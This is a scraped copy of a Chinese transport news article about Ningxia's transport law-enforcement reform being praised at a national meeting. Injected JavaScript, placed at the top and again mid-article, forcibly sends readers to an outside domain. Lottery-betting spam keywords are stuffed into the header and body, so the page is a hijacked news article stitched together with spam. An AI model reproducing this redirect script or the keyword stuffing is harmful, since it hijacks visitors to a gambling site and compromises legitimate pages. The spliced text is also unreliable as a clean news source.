function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

宁夏交通运输综合行政执法改革获肯定

2020-11-17 10:24:59 来源:中国交通新闻网 作者:通讯员 董玉伟 特约记者 梅宁生

1111日,交通运输综合行政执法改革工作推进会在湖南长沙召开,宁夏交通运输厅党委委员、副厅长金花围绕着宁夏交通运输综合行政执法改革的主要做法、取得成效等情况,作了题为《统筹构建全覆盖不交叉执法体系,推动交通运输综合执法高质量发展》的典型经验交流,得到交通运输部副部长戴东昌及与会兄弟省份领导的充分肯定。
三分彩计划function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

戴东昌副部长两次就宁夏交通运输综合执法改革点名表扬,就改革成效给予了高度肯定。他指出,宁夏等省区改革工作能全面落实、高效推进、平稳落地,得益于各省区党委、政府对改革工作的高度重视,高位推进;得益于各有关部门对改革工作的系统谋划、整体推进;得益于各级交通运输综合执法机构持续建章立制、破旧立新,才能将这项中央重大决策部署落实落地,同时积累形成了一批可复制、可推广的经验做法。各省区要认真学习借鉴,对标对表中央政策,主动化解矛盾问题,尽可能少走弯路,统筹构建起与交通运输治理体系和治理能力现代化相适应的体制机制。

目前,宁夏交通运输综合行政执法改革已基本完成,各级交通运输综合执法机构全部挂牌成立,交通运输领域执法门类和职责队伍全面整合,同步实现全区高速公路和普通国省干线执法职能自治区级统一执法和垂直管理,五市、宁东交通运输领域执法职能市县级统一执法和属地管理,推动形成了自治区和市县两个层级执法全覆盖、不交叉的交通运输综合行政执法体系,走出了一条“对标国家政策、具有宁夏特色、符合交通实际”改革发展新路子。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。